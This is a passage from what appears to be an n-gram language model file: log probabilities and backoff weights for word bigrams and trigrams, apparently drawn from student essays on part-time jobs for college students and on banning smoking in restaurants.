-1.647248 financially strapped -0.048957378
-1.3925304 his\/her reliance -0.048957378
-2.342011 would behoove -0.048957378
-3.5096595 , valid -0.048957378
-0.6942867 valid counter-argument -0.048957378
-3.28005 of paramount -0.048957378
-3.3047535 a doctor -0.048957378
-2.708228 can tolerate -0.048957378
-3.4650414 to repay -0.048957378
-2.7413492 I seriously -0.048957378
-0.6942867 seriously jeopardize -0.048957378
-1.7715586 To coin -0.048957378
-3.1293185 in vogue -0.048957378
-2.3729722 The expression -0.048957378
-0.6942267 vogue expression -0.048957378
-3.5096595 , gI -0.048957378
-1.5382957 am robbing -0.048957378
-0.6942867 robbing Peter -0.048957378
-1.868529 pay Paul -0.048957378
-0.6942867 Paul h. -0.048957378
-2.7567537 college rests -0.048957378
-2.3758469 The onus -0.048957378
-2.7396104 as innumerable -0.048957378
-3.2979217 and enlightened -0.048957378
-1.8678414 was 18 -0.048957378
-2.7972748 have liked -0.048957378
-3.120598 is nonetheless -0.048957378
-3.4931862 , nonetheless -0.048957378
-2.0264761 better approach -0.048957378
-2.1127527 This approach -0.048957378
-0.69396824 opposite approach -0.048957378
-0.69396824 rational approach -0.048957378
-2.7413492 I graduated -0.048957378
-3.4204583 the bills -0.048957378
-3.3047535 a smooth -0.048957378
-1.5938057 learned here -0.048957378
-1.5935729 true here -0.048957378
-1.536077 problem here -0.048957378
-0.69396824 examined here -0.048957378
-1.4715303 already started -0.048957378
-2.5483203 money aside -0.048957378
-0.6942267 Putting aside -0.048957378
-3.28005 of etime -0.048957378
-2.3332694 when workloads -0.048957378
-3.1293185 in volume -0.048957378
-3.3047535 a shift -0.048957378
-0.6942867 shift afterwards -0.048957378
-0.995135 expression ehealthy -0.048957378
-0.6942867 ehealthy body -0.048957378
-1.5961065 f rings -0.048957378
-2.9060166 are fatigued -0.048957378
-2.5982223 from over-exertion -0.048957378
-3.4204583 the weekend -0.048957378
-2.7972748 have availability -0.048957378
-2.4562922 this negates -0.048957378
-3.3047535 a 5-day -0.048957378
-3.3047535 a 6 -0.048957378
-3.1303647 is compounded -0.048957378
-3.0178597 that single -0.048957378
-3.0452757 for relaxation -0.048957378
-2.880715 be held -0.048957378
-1.1710447 rarely relied -0.048957378
-1.2958019 anyone else -0.048957378
-3.4650414 to utilize -0.048957378
-3.644728 <s> Obliging -0.048957378
-3.3047535 a detrimental -0.048957378
-3.0230536 their outlook -0.048957378
-3.4650414 to feelings -0.048957378
-3.5096595 , depression -0.048957378
-2.121458 even pessimism -0.048957378
-2.880715 be honest -0.048957378
-2.7413492 I hadn -0.048957378
-3.09512 <s> Indeed -0.187397
-3.0230536 their perspective -0.048957378
-3.644728 <s> Before -0.048957378
-2.561393 working 30 -0.048957378
-3.2979217 and hardly -0.048957378
-3.4650414 to catch -0.048957378
-2.7413492 I ended -0.048957378
-2.7364948 on cars -0.048957378
-3.4931862 , fancy -0.048957378
-2.4003265 my fancy -0.048957378
-3.5096595 , cigarettes -0.048957378
-3.5096595 , beer -0.048957378
-1.5963482 did drop -0.048957378
-2.7413492 I interviewed -0.048957378
-2.7309246 with cared -0.048957378
-3.3047535 a bartender -0.048957378
-1.1710447 clothes impress -0.048957378
-3.5096595 , anti-smoking -0.048957378
-1.1710447 currently lag -0.048957378
-2.3401537 would significantly -0.048957378
-0.6942267 lag significantly -0.048957378
-1.3925304 developed nations -0.048957378
-1.2958019 further progress -0.048957378
-2.7477093 a total -0.187397
-3.4000094 the total -0.187397
-2.36855 that smoking -0.20946135
-2.3460815 a smoking -0.13618872
-3.0569723 , smoking -0.048957378
-2.90498 of smoking -0.048957378
-2.7306316 their smoking -0.048957378
-1.8324649 course smoking -0.048957378
-1.7745919 restaurant smoking -0.048957378
-2.1157014 on smoking -0.11268411
-1.9264975 themselves smoking -0.048957378
-1.9336168 believe smoking -0.048957378
-1.5384129 up smoking -0.048957378
-1.5188298 quit smoking -0.048957378
-1.7386848 always smoking -0.048957378
-1.1625811 regular smoking -0.048957378
-1.52019 banned smoking -0.048957378
-1.4616349 ban smoking -0.13618872
-0.2717932 banning smoking -0.3855526
-0.69144475 passive smoking -0.048957378
-0.69144475 Banning smoking -0.048957378
-0.69144475 discourage smoking -0.048957378
-0.69144475 introduce smoking -0.048957378
-0.69144475 segregate smoking -0.048957378
-2.342011 would undoubtedly -0.048957378
-1.1710447 considerable resistance -0.048957378
-1.9456341 no restrictions -0.048957378
-0.6942267 partial restrictions -0.048957378
-3.644728 <s> Implementing -0.048957378
-2.342011 would represent -0.048957378
-1.5961916 complete opposite -0.048957378
-3.644728 <s> Between -0.048957378
-2.233106 these polar -0.048957378
-0.6942867 polar extremes -0.048957378
-1.1710447 middle route -0.048957378
-1.3925304 certainly advisable -0.048957378
-3.4650414 to urge -0.048957378
-3.063924 the smoke -0.048957378
-3.033918 of smoke -0.048957378
-1.9268204 to smoke -0.14477092
-1.6973147 who smoke -0.048957378
-1.7168427 still smoke -0.048957378
-1.5859333 hand smoke -0.048957378
-0.40891302 breathing smoke -0.048957378
-0.991978 inhaling smoke -0.048957378
-0.25396264 second-hand smoke -0.04895735
-1.1663197 tobacco smoke -0.048957378
-0.6927047 Tobacco smoke -0.13618872
-0.6927047 breathe smoke -0.048957378
-0.6927047 secondhand smoke -0.048957378
-3.4931862 , regardless -0.048957378
-2.165491 but regardless -0.048957378
-3.2979217 and well-being -0.048957378
-3.1293185 in considering -0.048957378
-2.5599043 the rights -0.04895735
-3.014355 their rights -0.048957378
-1.9223331 health concerns -0.048957378
-2.3701181 many places -0.048957378
-2.8837602 are places -0.048957378
-0.80713165 public places -0.048957378
-3.5096595 , partial -0.048957378
-2.4612203 for banning -0.187397
-3.3971481 , banning -0.048957378
-2.4029973 by banning -0.048957378
-2.6973925 of banning -0.187397
-1.4687891 completely banning -0.048957378
-1.5961065 been implemented -0.048957378
-3.09512 <s> Restaurants -0.048957378
-2.880715 be legally -0.048957378
-0.6942867 legally compelled -0.048957378
-3.2908964 a separate -0.048957378
-1.5964313 two separate -0.048957378
-3.5096595 , ventilated -0.048957378
-0.6942867 ventilated room -0.048957378
-1.2218008 restaurant patrons -0.048957378
-2.1514692 smoking patrons -0.048957378
-2.7186737 or alternatively -0.048957378
-2.1964433 such renovations -0.048957378
-3.246793 and non-smoking -0.048957378
-2.7130423 of non-smoking -0.048957378
-1.6454853 fully non-smoking -0.048957378
-1.3925304 non-smoking establishment -0.048957378
-1.4715303 already built -0.048957378
-2.1964433 such facilities -0.048957378
-1.2958019 current lax -0.048957378
-0.6942867 lax standards -0.048957378
-0.995135 nice meal -0.048957378
-1.8680959 without exposing -0.048957378
-1.868348 getting cancer -0.048957378
-3.5096595 , asthma -0.048957378
-1.969951 other respiratory -0.048957378
-3.4204583 the worst -0.048957378
-0.6942867 worst sufferers -0.048957378
-3.4000094 the ill -0.048957378
-1.5378767 quite ill -0.048957378
-3.321535 the effects -0.048957378
-1.9178393 health effects -0.048957378
-0.9944986 ill effects -0.048957378
-0.69396824 harmful effects -0.048957378
-3.09512 <s> Smoking -0.048957378
-0.995135 Smoking alone -0.048957378
-0.6942867 alone kills -0.048957378
-1.6475859 makes hundreds -0.048957378
-2.4510674 them sick -0.048957378
-2.0720463 because nowadays -0.048957378
-1.8672669 like everywhere -0.048957378
-1.3923441 law everywhere -0.048957378
-3.644728 <s> Inside -0.048957378
-3.4931862 , breathing -0.048957378
-1.295562 - breathing -0.048957378
-3.28005 of appetite -0.048957378
-2.7708824 it smells -0.048957378
-2.2803774 some harm -0.048957378
-3.644728 <s> Nothing -0.048957378
-2.708228 can justify -0.048957378
-3.4000094 the interference -0.048957378
-0.6942267 justify interference -0.048957378
-2.7665153 it justified -0.048957378
-0.6942267 perfectly justified -0.048957378
-2.7044797 can affect -0.048957378
-1.5379899 does affect -0.048957378
-3.3047535 a moral -0.048957378
-0.99501497 reasonable justification -0.048957378
-0.6942267 moral justification -0.048957378
-3.4204583 the @ -0.048957378
-3.2979217 and guide -0.048957378
-2.7024844 or choices -0.048957378
-1.8362309 right choices -0.048957378
-0.9947796 wise choices -0.048957378
-3.4204583 the warnings -0.048957378
-3.4204583 the campaigns -0.048957378
-2.9060166 are perfectly -0.048957378
-3.1303647 is passive -0.048957378
-2.8983755 are inhaling -0.048957378
-1.8672669 like inhaling -0.048957378
-3.5096595 , unknowingly -0.048957378
-2.9060166 are affecting -0.048957378
-3.644728 <s> Banning -0.048957378
-3.4204583 the premise -0.048957378
-3.3047535 a rational -0.048957378
-3.4204583 the employee -0.048957378
-1.8680823 like UK -0.048957378
-3.2979217 and parts -0.048957378
-3.28005 of US -0.048957378
-1.9223331 health conscious -0.048957378
-1.3925304 healthy citizens -0.048957378
-1.9702765 restaurants despite -0.048957378
-1.5385376 means infringement -0.048957378
-2.9982424 that second-hand -0.048957378
-3.244391 of second-hand -0.048957378
-3.4163227 to second-hand -0.048957378
-3.428628 , non-smokers -0.048957378
-3.21812 of non-smokers -0.048957378
-2.7177727 on non-smokers -0.048957378
-2.8669279 are non-smokers -0.048957378
-3.644728 <s> Family -0.048957378
-2.4184146 more prone -0.048957378
-3.0090466 for smokers -0.048957378
-2.842708 be smokers -0.048957378
-3.321535 the smokers -0.048957378
-2.7051468 of smokers -0.13618872
-3.644728 <s> Keeping -0.048957378
-2.7516315 a smoke-free -0.048957378
-2.7267487 will occur -0.048957378
-3.644728 <s> Putting -0.048957378
-3.2979217 and potentially -0.048957378
-3.28005 of unwanted -0.048957378
-0.6942267 unwanted exposure -0.048957378
-0.6942267 Regular exposure -0.048957378
-2.9982424 that tobacco -0.048957378
-3.4163227 to tobacco -0.048957378
-2.1488628 smoking tobacco -0.048957378
-3.4204583 the air -0.048957378
-3.3047535 a definite -0.048957378
-3.1303647 is served -0.048957378
-2.3758469 The smell -0.048957378
-1.2958019 becomes entangled -0.048957378
-3.4650414 to tell -0.048957378
-1.8957742 really tastes -0.048957378
-1.5379899 banned altogether -0.048957378
-1.9693077 restaurants altogether -0.048957378
-3.644728 <s> Smokers -0.048957378
-3.4204583 the welfare -0.048957378
-3.0178597 that includes -0.048957378
-2.7708678 <s> Tobacco -0.27955192
-3.2908964 a poison -0.048957378
-0.6942267 habit-forming poison -0.048957378
-1.868011 being anywhere -0.187397
-0.6942867 anywhere close -0.187397
-2.0529363 smoke permeates -0.048957378
-0.6942867 permeates foods -0.048957378
-2.4782233 people breathe -0.048957378
-2.7708824 it alters -0.048957378
-3.3047535 a habit-forming -0.048957378
-3.3047535 a stimulant -0.048957378
-2.4782233 people react -0.048957378
-0.6942867 react violently -0.048957378
-3.644728 <s> Customers -0.048957378
-2.7972748 have heard -0.048957378
-3.2908964 a smoky -0.187397
-1.9222652 too smoky -0.048957378
-2.7713203 not fair -0.048957378
-3.644728 <s> Restaurant -0.048957378
-3.644728 <s> Regular -0.048957378
-1.9924572 through withdrawal -0.048957378
-0.6942867 withdrawal pains -0.048957378
-2.0881407 become addicted -0.048957378
-3.644728 <s> Exposing -0.048957378
-2.469975 an insult -0.048957378
-3.3047535 a safety -0.048957378
-3.5096595 , selfish -0.048957378
-3.0452757 for implementing -0.048957378
-2.880715 be examined -0.048957378
-3.0178597 that concerning -0.048957378
-3.644728 <s> Principally -0.048957378
-3.4000094 the wise -0.048957378
-0.99501497 similarly wise -0.048957378
-2.3099248 be forced -0.187397
-2.8983755 are forced -0.048957378
-3.4650414 to compromise -0.048957378
-1.1710447 choices regarding -0.048957378
-1.9465656 own lifestyles -0.048957378
-3.4650414 to discourage -0.048957378
-2.1525254 most importantly -0.048957378
-2.1061108 into account -0.048957378
-3.3047535 a smoke-filled -0.048957378
-2.880715 be ignored -0.048957378
-3.5096595 , long-term -0.048957378
-3.4204583 the national -0.048957378
-0.6942867 national healthcare -0.048957378
-0.995135 seek treatment -0.048957378
-3.0452757 for tobacco-related -0.048957378
-0.6942867 tobacco-related illnesses -0.048957378
-2.0522041 's context -0.048957378
-1.9222482 ; firstly -0.048957378
-3.4650414 to promote -0.048957378
-2.8842342 the comfort -0.048957378
-1.3925304 non-smoking diners -0.048957378
-0.995135 Despite proven -0.048957378
-0.995135 popular amongst -0.048957378
-2.4573839 all ages -0.048957378
-2.1524544 social pastime -0.048957378
-2.0881407 become deeply -0.048957378
-0.6942867 deeply integrated -0.048957378
-3.28005 of passively -0.048957378
-0.6942867 passively contracting -0.048957378
-1.7351952 related illness -0.048957378
-1.9229224 too severe -0.048957378
-3.0230536 their profits -0.048957378
-3.4650414 to introduce -0.048957378
-1.3925304 non-smoking sections -0.048957378
-3.4650414 to segregate -0.048957378
-2.208895 which suits -0.048957378
-3.4650414 to succeed -0.048957378
-2.0331504 about gradually -0.048957378
-2.4199624 by improving -0.048957378
-3.4204583 the clearly -0.048957378
-0.6942867 clearly harmful -0.048957378
-3.28005 of secondhand -0.048957378
\3-grams:
-0.0011299675 <s> . </s>
-0.0011299675 disagree . </s>
-0.0003983347 this . </s>
-0.00049796904 statement . </s>
-0.0006641202 for . </s>
-0.00014224081 reasons . </s>
-0.00019916052 it . </s>
-0.0011299675 part-time . </s>
-0.000051024243 job . </s>
-0.0006641202 is . </s>
-0.00024893903 student . </s>
-0.00022127786 graduation . </s>
-0.0011299675 not . </s>
-0.0006641202 case . </s>
-0.00024893903 employment . </s>
-0.00082123175 in . </s>
-0.0003983347 field . </s>
-0.0011299675 to . </s>
-0.00014224081 study . </s>
-0.0002845023 studying . </s>
-0.0011299675 engineering . </s>
-0.00019916052 experience . </s>
-0.0011299675 from . </s>
-0.00033193317 working . </s>
-0.0006641202 restaurant . </s>
-0.0011299675 there . </s>
-0.00012445169 students . </s>
-0.00082123175 stress . </s>
-0.00082123175 on . </s>
-0.00014224081 studies . </s>
-0.00019916052 time . </s>
-0.00009480477 jobs . </s>
-0.0011299675 one . </s>
-0.0011299675 tired . </s>
-0.0011299675 focus . </s>
-0.00013276354 school . </s>
-0.00012445169 work . </s>
-0.0011299675 produced . </s>
-0.0011299675 such . </s>
-0.0003983347 -RRB- . </s>
-0.0011299675 pursuing . </s>
-0.0011299675 should . </s>
-0.0011299675 necessary . </s>
-0.00010479905 college . </s>
-0.0011299675 have . </s>
-0.00011062484 money . </s>
-0.0011299675 say . </s>
-0.0011299675 you . </s>
-0.0011299675 some . </s>
-0.00082123175 bad . </s>
-0.0011299675 begin . </s>
-0.0011299675 today . </s>
-0.00082123175 degree . </s>
-0.00024893903 well . </s>
-0.0011299675 are . </s>
-0.00033193317 career . </s>
-0.0006641202 experiences . </s>
-0.0011299675 offer . </s>
-0.00082123175 benefit . </s>
-0.00024893903 future . </s>
-0.0011299675 consider . </s>
-0.00082123175 skill . </s>
-0.0011299675 academic . </s>
-0.00082123175 more . </s>
-0.0011299675 employers . </s>
-0.0011299675 better . </s>
-0.0011299675 organization . </s>
-0.0011299675 industry . </s>
-0.00022127786 skills . </s>
-0.00033193317 important . </s>
-0.0011299675 employer . </s>
-0.0006641202 management . </s>
-0.0011299675 taking . </s>
-0.0011299675 positively . </s>
-0.0011299675 through . </s>
-0.0011299675 productive . </s>
-0.0006641202 themselves . </s>
-0.0011299675 environment . </s>
-0.0006641202 position . </s>
-0.0011299675 abilities . </s>
-0.0011299675 same . </s>
-0.00082123175 financially . </s>
-0.0006641202 issue . </s>
-0.0011299675 enough . </s>
-0.0011299675 food . </s>
-0.00082123175 times . </s>
-0.00082123175 need . </s>
-0.0011299675 emergency . </s>
-0.00082123175 earned . </s>
-0.0011299675 good . </s>
-0.00082123175 idea . </s>
-0.00082123175 others . </s>
-0.0006641202 like . </s>
-0.0003983347 parents . </s>
-0.00082123175 friends . </s>
-0.00082123175 relationships . </s>
-0.0003983347 people . </s>
-0.0011299675 true . </s>
-0.0011299675 College . </s>
-0.0011299675 stable . </s>
-0.0011299675 do . </s>
-0.0011299675 something . </s>
-0.0011299675 advantage . </s>
-0.0011299675 high . </s>
-0.0011299675 classes . </s>
-0.0011299675 know . </s>
-0.0006641202 ft. . </s>
-0.0011299675 all . </s>
-0.00033193317 them . </s>
-0.0011299675 futures . </s>
-0.0002845023 society . </s>
-0.0011299675 specialized . </s>
-0.0011299675 contexts . </s>
-0.0011299675 specialty . </s>
-0.0011299675 itself . </s>
-0.0011299675 specialization . </s>
-0.0011299675 fields . </s>
-0.00082123175 temptation . </s>
-0.00082123175 activities . </s>
-0.0011299675 socialize . </s>
-0.0011299675 results . </s>
-0.0011299675 teachers . </s>
-0.0011299675 demands . </s>
-0.00011062484 life . </s>
-0.00082123175 workforce . </s>
-0.0006641202 responsibilities . </s>
-0.0006641202 university . </s>
-0.0011299675 up . </s>
-0.0011299675 sleeping . </s>
-0.0011299675 repercussions . </s>
-0.0011299675 difficult . </s>
-0.0011299675 lifestyle . </s>
-0.00082123175 helpful . </s>
-0.0011299675 regard . </s>
-0.00082123175 finances . </s>
-0.0011299675 responsibly . </s>
-0.0011299675 cards . </s>
-0.0011299675 loans . </s>
-0.00082123175 etc. . </s>
-0.0011299675 peril . </s>
-0.00082123175 income . </s>
-0.0011299675 debts . </s>
-0.00049796904 expenses . </s>
-0.0003983347 family . </s>
-0.0011299675 adult . </s>
-0.00082123175 development . </s>
-0.0011299675 independent . </s>
-0.00049796904 graduate . </s>
-0.0011299675 professional . </s>
-0.0006641202 customers . </s>
-0.0011299675 responsible . </s>
-0.00082123175 achievement . </s>
-0.0011299675 necessity . </s>
-0.0011299675 sense . </s>
-0.00082123175 force . </s>
-0.0011299675 staff . </s>
-0.00082123175 situation . </s>
-0.00082123175 year . </s>
-0.00012445169 education . </s>
-0.00033193317 world . </s>
-0.00082123175 success . </s>
-0.0011299675 entirely . </s>
-0.00082123175 importance . </s>
-0.0011299675 own . </s>
-0.0011299675 pockets . </s>
-0.0011299675 transition . </s>
-0.0006641202 campus . </s>
-0.0011299675 cultivated . </s>
-0.0011299675 without . </s>
-0.0011299675 about . </s>
-0.0011299675 product . </s>
-0.0011299675 limited . </s>
-0.0011299675 assignments . </s>
-0.0011299675 either . </s>
-0.00049796904 too . </s>
-0.0011299675 complicated . </s>
-0.0006641202 business . </s>
-0.0011299675 ethic . </s>
-0.0011299675 learn . </s>
-0.00082123175 lessons . </s>
-0.0011299675 exhausting . </s>
-0.0011299675 straight . </s>
-0.0011299675 quit . </s>
-0.00049796904 beneficial . </s>
-0.0011299675 possible . </s>
-0.00082123175 years . </s>
-0.0011299675 medicine . </s>
-0.0011299675 three . </s>
-0.0011299675 lesson . </s>
-0.0011299675 before . </s>
-0.0011299675 organizations . </s>
-0.0011299675 gates . </s>
-0.0011299675 meet . </s>
-0.0011299675 new . </s>
-0.0011299675 against . </s>
-0.0011299675 load . </s>
-0.00082123175 performance . </s>
-0.0011299675 books . </s>
-0.0011299675 hindrance . </s>
-0.00082123175 worked . </s>
-0.0011299675 workload . </s>
-0.00082123175 needs . </s>
-0.0006641202 costs . </s>
-0.0011299675 afford . </s>
-0.00082123175 process . </s>
-0.0011299675 system . </s>
-0.00082123175 practice . </s>
-0.00049796904 adults . </s>
-0.0011299675 counterparts . </s>
-0.0011299675 problem . </s>
-0.0011299675 since . </s>
-0.0011299675 concerned . </s>
-0.0011299675 sophisticated . </s>
-0.0011299675 effect . </s>
-0.00049796904 workplace . </s>
-0.0011299675 instead . </s>
-0.0011299675 material . </s>
-0.0011299675 concern . </s>
-0.0011299675 worker . </s>
-0.0006641202 problems . </s>
-0.0011299675 families . </s>
-0.0011299675 began . </s>
-0.0011299675 far . </s>
-0.0011299675 immersed . </s>
-0.0011299675 rest . </s>
-0.0006641202 lives . </s>
-0.00082123175 want . </s>
-0.0003983347 things . </s>
-0.0011299675 drinks . </s>
-0.0011299675 harder . </s>
-0.0011299675 suffer . </s>
-0.00082123175 fun . </s>
-0.0011299675 tasks . </s>
-0.0011299675 fatal . </s>
-0.0003983347 Japan . </s>
-0.00082123175 America . </s>
-0.0006641202 freedom . </s>
-0.0011299675 think . </s>
-0.0011299675 anything . </s>
-0.0011299675 why . </s>
-0.0011299675 attend . </s>
-0.0006641202 wisely . </s>
-0.0011299675 commodity . </s>
-0.0011299675 hours . </s>
-0.0011299675 5 . </s>
-0.0006641202 days . </s>
-0.00082123175 week . </s>
-0.0011299675 easily . </s>
-0.00049796904 day . </s>
-0.0011299675 coworkers . </s>
-0.0011299675 underway . </s>
-0.0011299675 home . </s>
-0.0006641202 responsibility . </s>
-0.0011299675 homework . </s>
-0.0011299675 completed . </s>
-0.0011299675 lunch . </s>
-0.0011299675 mentioned . </s>
-0.00082123175 person . </s>
-0.0011299675 twenties . </s>
-0.0011299675 remuneration . </s>
-0.0011299675 independence . </s>
-0.0011299675 easier . </s>
-0.0011299675 ask . </s>
-0.0011299675 Sydney . </s>
-0.0011299675 companies . </s>
-0.0011299675 test . </s>
-0.0011299675 character . </s>
-0.0011299675 thing . </s>
-0.0003983347 economy . </s>
-0.0011299675 attached . </s>
-0.0011299675 common . </s>
-0.00082123175 class . </s>
-0.0011299675 faculty . </s>
-0.00082123175 individual . </s>
-0.0011299675 coursework . </s>
-0.0011299675 discipline . </s>
-0.0011299675 details . </s>
-0.0011299675 co-workers . </s>
-0.0006641202 age . </s>
-0.0011299675 clear . </s>
-0.0011299675 finance . </s>
-0.00082123175 resources . </s>
-0.0011299675 copywriting . </s>
-0.0011299675 office . </s>
-0.0011299675 newcomer . </s>
-0.0011299675 mentoring . </s>
-0.0011299675 career-oriented . </s>
-0.0011299675 branch . </s>
-0.0011299675 beings . </s>
-0.00033193317 opinion . </s>
-0.0011299675 us . </s>
-0.0011299675 under . </s>
-0.0011299675 allowed . </s>
-0.0011299675 conditions . </s>
-0.0011299675 fate . </s>
-0.0011299675 generations . </s>
-0.0011299675 irreversible . </s>
-0.0011299675 nation . </s>
-0.0011299675 production . </s>
-0.0011299675 agendas . </s>
-0.0011299675 accepted . </s>
-0.0011299675 right . </s>
-0.0011299675 self-improvement . </s>
-0.0011299675 stage . </s>
-0.0011299675 self-supporting . </s>
-0.0011299675 whole . </s>
-0.0011299675 youth . </s>
-0.0011299675 schooling . </s>
-0.0011299675 purposes . </s>
-0.0011299675 desired . </s>
-0.0011299675 classroom . </s>
-0.0011299675 balance . </s>
-0.0011299675 points . </s>
-0.0011299675 socially . </s>
-0.00082123175 careers . </s>
-0.0011299675 cities . </s>
-0.0011299675 ends . </s>
-0.0011299675 stronger . </s>
-0.0011299675 actions . </s>
-0.0011299675 together . </s>
-0.0011299675 lectures . </s>
-0.0011299675 degrees . </s>
-0.0011299675 expensive . </s>
-0.0011299675 busy . </s>
-0.0011299675 professionals . </s>
-0.0011299675 sources . </s>
-0.0011299675 faster . </s>
-0.00082123175 children . </s>
-0.0011299675 had . </s>
-0.0011299675 pharmacy . </s>
-0.0011299675 1 . </s>
-0.0011299675 2 . </s>
-0.0011299675 3 . </s>
-0.0011299675 resume . </s>
-0.0011299675 4 . </s>
-0.0011299675 survive . </s>
-0.0011299675 vacation . </s>
-0.0011299675 path . </s>
-0.0011299675 homework\/assignments . </s>
-0.0011299675 using . </s>
-0.0011299675 initiative . </s>
-0.00082123175 customer . </s>
-0.0011299675 spending . </s>
-0.0011299675 welcome . </s>
-0.0011299675 research . </s>
-0.0011299675 professor . </s>
-0.0011299675 merit . </s>
-0.0011299675 materials . </s>
-0.0011299675 large . </s>
-0.0011299675 changes . </s>
-0.0011299675 me . </s>
-0.0011299675 goal . </s>
-0.00082123175 rewarding . </s>
-0.0011299675 everyday . </s>
-0.0011299675 bill . </s>
-0.0011299675 vacations . </s>
-0.0011299675 employees . </s>
-0.0011299675 multi-task . </s>
-0.0011299675 assignment . </s>
-0.0011299675 difficulties . </s>
-0.0011299675 yourself . </s>
-0.00082123175 entertainment . </s>
-0.0011299675 porter . </s>
-0.0006641202 opinions . </s>
-0.00082123175 textbook . </s>
-0.0011299675 lifetime . </s>
-0.0011299675 glife . </s>
-0.0011299675 clothes . </s>
-0.0011299675 groups . </s>
-0.0011299675 etiquette . </s>
-0.0011299675 language . </s>
-0.0011299675 weekends . </s>
-0.0011299675 regimen . </s>
-0.0011299675 absurd . </s>
-0.0011299675 habits . </s>
-0.0011299675 online . </s>
-0.0011299675 mentioning . </s>
-0.0011299675 failure . </s>
-0.00082123175 desires . </s>
-0.0011299675 track . </s>
-0.0011299675 claim . </s>
-0.0011299675 enhancements . </s>
-0.00082123175 involved . </s>
-0.0011299675 state . </s>
-0.0011299675 population . </s>
-0.0011299675 institutes . </s>
-0.00082123175 guardians . </s>
-0.0011299675 earners . </s>
-0.0011299675 anyway . </s>
-0.0011299675 negligible . </s>
-0.0011299675 fine . </s>
-0.0011299675 discretion . </s>
-0.0011299675 casework . </s>
-0.0006641202 health . </s>
-0.0011299675 bulb . </s>
-0.0011299675 cherished . </s>
-0.0011299675 ideas . </s>
-0.0011299675 peers . </s>
-0.0011299675 exams . </s>
-0.0011299675 larger . </s>
-0.0011299675 threat . </s>
-0.0011299675 properly . </s>
-0.0011299675 exhaustion . </s>
-0.0011299675 heavily . </s>
-0.0011299675 smaller . </s>
-0.0011299675 nightclubs . </s>
-0.0011299675 Vegas . </s>
-0.0011299675 diploma . </s>
-0.0011299675 drug . </s>
-0.0011299675 prizes . </s>
-0.0011299675 proud . </s>
-0.0011299675 goals . </s>
-0.0011299675 holiday . </s>
-0.0011299675 partying . </s>
-0.0011299675 funds . </s>
-0.00024893903 restaurants . </s>
-0.0011299675 short-sighted . </s>
-0.0011299675 assistants . </s>
-0.0011299675 mastered . </s>
-0.0011299675 barricades . </s>
-0.0011299675 cobblestones . </s>
-0.0011299675 discouraged . </s>
-0.0011299675 States . </s>
-0.0011299675 consuming . </s>
-0.0011299675 existence . </s>
-0.0011299675 eat . </s>
-0.0011299675 sake . </s>
-0.0011299675 analysis . </s>
-0.0011299675 past . </s>
-0.0011299675 worries . </s>
-0.0011299675 falter . </s>
-0.0011299675 schoolwork . </s>
-0.0011299675 overwhelmed . </s>
-0.0011299675 doctor . </s>
-0.0011299675 here . </s>
-0.0011299675 volume . </s>
-0.0011299675 afterwards . </s>
-0.0011299675 pessimism . </s>
-0.0011299675 perspective . </s>
-0.0003983347 smoking . </s>
-0.0011299675 route . </s>
-0.0003983347 smoke . </s>
-0.0011299675 well-being . </s>
-0.0011299675 patrons . </s>
-0.0011299675 establishment . </s>
-0.0011299675 sick . </s>
-0.0011299675 everywhere . </s>
-0.0011299675 justified . </s>
-0.0011299675 citizens . </s>
-0.00082123175 non-smokers . </s>
-0.00082123175 altogether . </s>
-0.0011299675 stimulant . </s>
-0.0011299675 fair . </s>
-0.0011299675 lifestyles . </s>
-0.0011299675 account . </s>
-0.0011299675 ignored . </s>
-0.0011299675 illnesses . </s>
-0.052752033 it ? </s>
-0.052752033 job ? </s>
-0.052752033 in ? </s>
-0.052752033 experience ? </s>
-0.037705705 students ? </s>
-0.052752033 studies ? </s>
-0.052752033 time ? </s>
-0.052752033 money ? </s>
-0.052752033 skills ? </s>
-0.052752033 education ? </s>
-0.052752033 world ? </s>
-0.052752033 subjective ? </s>
-0.052752033 straightforward ? </s>
-0.052752033 lives ? </s>
-0.052752033 Japan ? </s>
-0.052752033 generally ? </s>
-0.052752033 anything ? </s>
-0.052752033 stage ? </s>
-0.052752033 authorities ? </s>
-0.052752033 governments ? </s>
-0.052752033 competency ? </s>
-0.052752033 attitude ? </s>
-0.052752033 bursary ? </s>
-0.052752033 here ? </s>
-0.44962466 ! -RRB- </s>
-0.11280921 more ! </s>
-0.11280921 loans ! </s>
-0.11280921 never ! </s>
-0.11280921 labor ! </s>
-0.11280921 wanted ! </s>
-0.11280921 habits ! </s>
-0.11280921 wrong ! </s>
-0.11280921 guess ! </s>
-0.11280921 properly ! </s>
-0.11280921 Never ! </s>
-0.11280921 unite ! </s>
-1.456529 the individual </s>
-1.3160119 main reasons I
-0.5247254 these reasons I
-1.2669382 is that I
-1.2391255 time that I
-2.3587446 part-time job I
-1.0731478 the job I
-1.0511867 statement , I
-0.12622261 reasons , I
-1.0511867 reason , I
-1.3933818 time , I
-1.0511867 one , I
-1.0511867 tired , I
-1.0511867 such , I
-0.5804621 Yes , I
-0.84714526 begin , I
-0.84714526 issue , I
-0.84714526 effort , I
-0.5804621 conclusion , I
-1.1480443 university , I
-1.0511867 up , I
-0.84714526 myself , I
-1.4085877 Secondly , I
-1.2448889 Thirdly , I
-0.84714526 though , I
-1.0511867 possible , I
-1.0511867 now , I
-1.0511867 But , I
-1.1480443 Japan , I
-0.84714526 anything , I
-0.84714526 days , I
-0.84714526 above , I
-0.84714526 note , I
-0.84714526 Interestingly , I
-0.84714526 Personally , I
-0.84714526 Again , I
-0.84714526 honest , I
-2.0123065 , and I
-0.93760747 today and I
-1.4648623 friends and I
-1.2065854 wasted and I
-0.93760747 here and I
-1.159431 , as I
-0.8899772 often as I
-0.8899772 off as I
-0.8899772 graduating as I
-1.2240663 this reason I
-1.038254 main reason I
-1.5444729 Many students I
-1.3439496 <s> Therefore I
-1.1731842 , then I
-2.0851924 in college I
-1.6633887 <s> And I
-0.9474127 years so I
-0.80001366 me : I
-0.80001366 habits : I
-0.8968427 the employers I
-0.91829836 -LRB- like I
-0.9632034 job when I
-0.79009527 grades when I
-0.79009527 discover when I
-0.79009527 car when I
-0.9006391 I what I
-0.9006391 choosing what I
-0.9422184 nor could I
-0.40157807 statement because I
-0.76916724 that because I
-0.76916724 But because I
-1.9852931 <s> If I
-0.60589385 I whatever I
-0.60589385 on whatever I
-1.2887409 the responsibilities I
-1.1195781 something which I
-0.88862014 travel which I
-0.8834839 studies however I
-0.9323421 fs where I
-0.70085645 certain extent I
-1.437823 <s> So I
-1.1305163 <s> Perhaps I
-1.829635 I think I
-0.61290467 reasons why I
-0.9393757 is why I
-1.0088986 In Australia I
-0.70085645 in summary I
-0.5384965 <s> Overall I
-0.62205684 <s> When I
